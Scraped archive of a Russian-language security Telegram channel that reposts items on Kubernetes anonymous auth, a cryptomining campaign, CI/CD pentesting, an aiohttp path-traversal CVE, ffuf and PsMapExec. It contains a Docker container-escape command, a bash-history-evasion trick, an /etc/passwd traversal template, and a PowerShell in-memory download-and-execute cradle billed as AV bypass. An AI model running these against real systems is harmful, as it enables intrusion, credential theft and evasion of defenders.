ar
Feedback
Fsecurity | HH

Fsecurity | HH

الذهاب إلى القناة على Telegram
2 010
المشتركون
+224 ساعات
-17 أيام
-1030 أيام
أرشيف المشاركات
Наверное, я должен это написать... Я не привык, что так много вас. Выражаю соболезнования всем пострадавшим… 🕯 Надеюсь, это быстрее закончится P.s. всем желаю здоровья

Repost from k8s (in)security
Вчера в одном из чатов тренинга нас спросили наше мнение насчет следующего момента из документации kubespray:"The anonymous-a
Вчера в одном из чатов тренинга нас спросили наше мнение насчет следующего момента из документации kubespray:"The anonymous-auth (on kube-apiserver) is set to true by default. This is fine, because it is considered safe if you enable RBAC for the authorization-mode." Что явно противоречит пункту 1.2.1 из CIS Kubernetes Benchmark 1.8, который гласит: "Ensure that the --anonymous-auth argument is set to false" (по умолчанию значение true). Но там же в разделе написано: "If you are using RBAC authorization, it is generally considered reasonable to allow anonymous access to the API Server for health checks and discovery purposes, and hence this recommendation is not scored. However, you should consider whether anonymous discovery is an acceptable risk for your purposes." Что по сути уже повторяет смысл из документации kubespray. Помните: 1. У пользователя system:anonymous и группы system:unauthenticated (от которых идут такие запросы) тоже есть права. 2. Включенный RBAC (если он включен, иначе туши свет) будет по этим правам давать им доступ. 3. Атакующий может накинуть права в RBAC для данного пользователя и группы, и он сможет пользоваться этими правами без аутентификации (считай backdoor). Если у вас разрешен анонимный доступ, контролируйте, что нет дополнительных прав. По этой теме будет полезно вспомнить также статью "Let's talk about anonymous access to Kubernetes".

Repost from PurpleBear
New Linux Malware Campaign Targets Docker, Apache Hadoop, Redis and Confluence Отчет с таким названием от исследователей из Cado Security лежал у меня в бэклоге почти две недели дожидаясь своего часа⏰ Содержание отчета представляет собой вполне детальный разбор кампании нацеленной на эксплуатацию RCE-уязвимости CVE-2022-26134 в Confluence и мисконфигов Docker Engine API на tcp/2375, Apache Hadoop YARN API на tcp/8088 и Redis на tcp/6379 с целью запуска майнеров Monero - XMRig ➡️ Вектор атаки: ☑️ Эксплуатация CVE-2022-26134 в Confluence и мисконфига Docker Engine API с классическим побегом из контейнера: docker -H <target-ip>:2375 run -v /:/mnt --rm -it alpine:latest chroot /mnt sh ☑️ Далее не менее классическая схема: bash скрипт с помощью сron связывается с С2, тащит ELF бинари 64-bit Golang и необходимый софт, в том числе сетевые сканнеры masscan, zgrab2, pnscan для поиска Hadoop YARN, Redis ☑️ Установка XMRig для майнинга криптовалюты В целом ничего примечательного, за исключением попыток еще более ослабить защищенность системы (weakening) и затруднить мероприятия по форензике. 🤔Из интересного: ☑️ Способ избавиться от .bash_history c помощью shopt (shell options), при этом сама команда на перетирание тоже не остается в history после перезапуска шелла
shopt -ou history 2>/dev/null 1>/dev/null
☑️ Использование в качестве С2 - open source инструмента Platypus - modern multiple reverse shell sessions/clients manager via terminal written in go ☑️ Использование сканера - pnscan - Peter's Parallel Network Scanner🤷‍♂️ (c) 2002-2020 by Peter Eriksson, который судя по README предпочитает крепкие напитки😎
If you like it then I'd gladly accept a nice bottle of whisky,
some free beer or even just a "Thank you!" email :-)

Repost from Blue (h/c)at Café
🔺 Ускоряем пентест CI/CD
Пост должен был выйти чуть позже, но увидев, что скоро начнется соревнование для попадания на Standoff 13 👨‍💻 я решил выпустить его чуть раньше. Он может вам пригодиться, особенно, если оценивать прошлый год.
В последние годы пентестеры все больше обращают внимание на присутствие платформ DevOps, а уже и DevSecOps. Эти экосистемы состоят из различных сервисов, используемых в конвейерах CI/CD, включая: 🔵 Репозитории исходного кода (Gitlab, Gitea) 🔵 Реестры контейнеров (Docker Registry, Sonatype Nexus, JFrog) 🔵 Серверы автоматизации (Gitlab-CI, Jenkins) 🔵 Инструменты для обеспечения качества и безопасности кода (много об этом говорили). Перспективы копать именно под CI/CD: Возможности и проблемы Для злоумышленников и пентестеров экосистема CI/CD представляет собой "обоюдоострый меч" — богатство информации и потенциальные точки входа. Слияние множества сервисов, от репозиториев до серверов автоматизации, хранит в себе кучу данных, включая исходный код, образы контейнеров и различные учетные данные 🌐. Такая среда облегчает горизонтальное перемещение, а скомпрометированные API-токены открывают путь для дальнейшей эксплуатации. Мой личный опыт работы показывает, что компрометация облачных сервисов через CI/CD — это быстрый путь к эскалации. (привет уязвимостям в GitLab 🤗)
📕 Пример таких уязвимостей: CVE-2022-2185 — ТЫК CVE-2021-22205 — ТЫК CVE-2023-5009 — ТЫК CVE-2023-7028 — ТЫК CVE-2024-0402 — ТЫК
Но тут возникают сложности... множество целей в экосистеме CI/CD, зависимость от официальных API для атак и огромный объем данных требуют стратегического и автоматизированного подхода. 😜 Виновник поста или швейцарский нож для тестирования на проникновение в CI/CD 💻 Сразу ссылка на инструмент — ТЫК Epyon был представлен в 2022 году как универсальный инструмент для работы пентестеров в экосистемах CI/CD. Разработанный на языке 💻, включает в себя ряд модулей, предназначенных для взаимодействия с распространенными системами DevOps, и легко интегрируется с такими инструментами, как Gitleaks и TruffleHog, для улучшения разведки и эксплуатации (именно этим мне он и понравился). Модули Epyon охватывают широкий спектр, включая: 1. Gitlab 2. Github 3. Jenkins 4. Azure DevOps 5. Sonatype Nexus 6. Docker Registry 7. Sonarqube 8. Gitea 9. Artifactory 10. Terraform Cloud/Enterprise ✏️ Перейдем к тестам Я протестировал его в своей домашней лаборатории, изучив модули Gitlab(community), Jenkins, Nexus(community) и Docker Registry (про него и поговорим).
Изначально хотел проверить на Gitlab, но столкнулся с проблемой. У меня слишком много проектов, которые пришлось бы скрывать, чтобы не показывать спойлеры для будущих проектов и стратап-идей.
Пример: HTTP API Docker Registry. Команда epyon registry может быть использована для взаимодействия с реестром Docker: Epyon позволяет пользователям легко взаимодействовать с API реестра и получать информацию о нескольких образах контейнеров. Следующий список показывает шаги, которые были выполнены в этом примере: Шаг 01: Получить список образов Опция list-images может быть использована для перечисления всех образов контейнеров. Шаг 02: Получить теги для каждого образа Опция list-tags получит все доступные теги для каждого образа. Шаг 03: Скачать образы контейнеров Опция download-images загрузит и извлечет содержимое образа (загруженные файлы будут помещены в каталог, указанный в файле config.yaml). Шаг 04: Поиск учетных данных Недавно в каком-то из чатов спрашивали про поиск учеток в докере. Так вот, как там и ответил, я буду использовать Trufflehog. 🥂 Profit Вот нами уже и найдены login/pass, api key и много других критически важных артефактов 🛡 Заключение В нашем деле важно уметь сокращать время, затрачиваемое на выполнение рутинных задач. И данный инструмент с этим справляется как нельзя кстати. Из минусов хочу отметить отсутствие тонкой настройки работы через конфиг, хотя сделать это через библиотеку go viper достаточно просто. #redteam

Repost from Похек
🔓 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров 🔓 Исследователи предупреждают, что недавно исправленная уя
🔓 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров 🔓 Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate. Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API. ❤️ Шаблон для nuclei
id: "aiohttp"

info:
  name: aiohttp LFI
  author: crth0
  severity: high
  description: CVE-2024-23334 Check LFI.
  reference:
    - https://github.com/jhonnybonny
  classification:
  tags: aiohttp,LFI,CVE-2024-23334


http:
  - method: GET
    path:
      - '{{BaseURL}}/static/../etc/passwd'
      - '{{BaseURL}}/static/../../etc/passwd'
      - '{{BaseURL}}/static/../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../../etc/passwd'
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
        condition: and
по сути даже шаблона не нужно, тут обычный path traversal 🔓 Читать далее ❤️ PoC 🌚 @poxek

Repost from Pentest HaT
⚙️ ffuf - Fuzz Faster U Fool v2.1.0 💻 Очень быстрый веб фаззер написанный на 🖼️ Go Fuzzing - перебор директорий, параметров
⚙️ ffuf - Fuzz Faster U Fool v2.1.0 💻 Очень быстрый веб фаззер написанный на 🖼️ Go Fuzzing - перебор директорий, параметров, заголовков (headers) ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы. В 💻 Kali установлен по умолчанию. Установка: go install github.com/ffuf/ffuf/v2@latest Примеры использования:
ffuf -w /wordlists/rockyou.txt -u https://example.com/FUZZ
ffuf -w /wordlists/rockyou.txt -u https://example.com/page.php?FUZZ=1
ffuf -w /wordlists/rockyou.txt -u https://example.com -H "Host: FUZZ.example.com"
Основные фильтры:
fc - HTTP status (-fc 404)
fs - размер ответа (-fs 0)
fl - кол-во линий (-fl 16)
fw - кол-во слов (-fw 2)
Заворачиваем в 😈 Burp (proxy): -x "http://127.0.0.1:8080" Флаг -c сделает вывод цветным, рекомендую, по дефолту - False 💻 Home #ffuf #fuzzing #fuzzer #golang ✈️ // Pentest HaT 🎩

Недавно нашел bypass всем известной библиотеки DOMPurify в одном интересном случае Сегодня вышли версии с исправлениями Прочи
Недавно нашел bypass всем известной библиотеки DOMPurify в одном интересном случае Сегодня вышли версии с исправлениями Прочитать разбор можно тут

Repost from Memes 365
Опер

Хочу также посоветовать: 1 - Проверить себя на утечки! 💧 2 - Наш discord сервер! Где можно пообщаться 👾 3 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

Repost from Pentest HaT
🔄 💻 PsMapExec v0.5.2 Утилита для пост эксплуатации 💻 Active Directory окружения написанная на PowerShell. Вдохновлена Crac
🔄 💻 PsMapExec v0.5.2 Утилита для пост эксплуатации 💻 Active Directory окружения написанная на PowerShell. Вдохновлена CrackMapExec Текущая поддержка методов (протоколов): 🔵RDP 🔵SessionHunter 🔵SMB 🔵SMB Signing 🔵Spraying 🔵VNC 🔵WinRM 🔵WMI 🔵MSSQL Загрузка скрипта в память (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
Примеры:
# Current user
PsMapExec -Targets All -Method [Method]

# With Password
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# With Hash
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# With Ticket
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI only)
PsMapExec -Targets All -Method WMI -LocalAuth
💻 Github ▪️ Documentation #soft #pentest #powershell #psmapexec ✈️ // Pentest HaT 🎩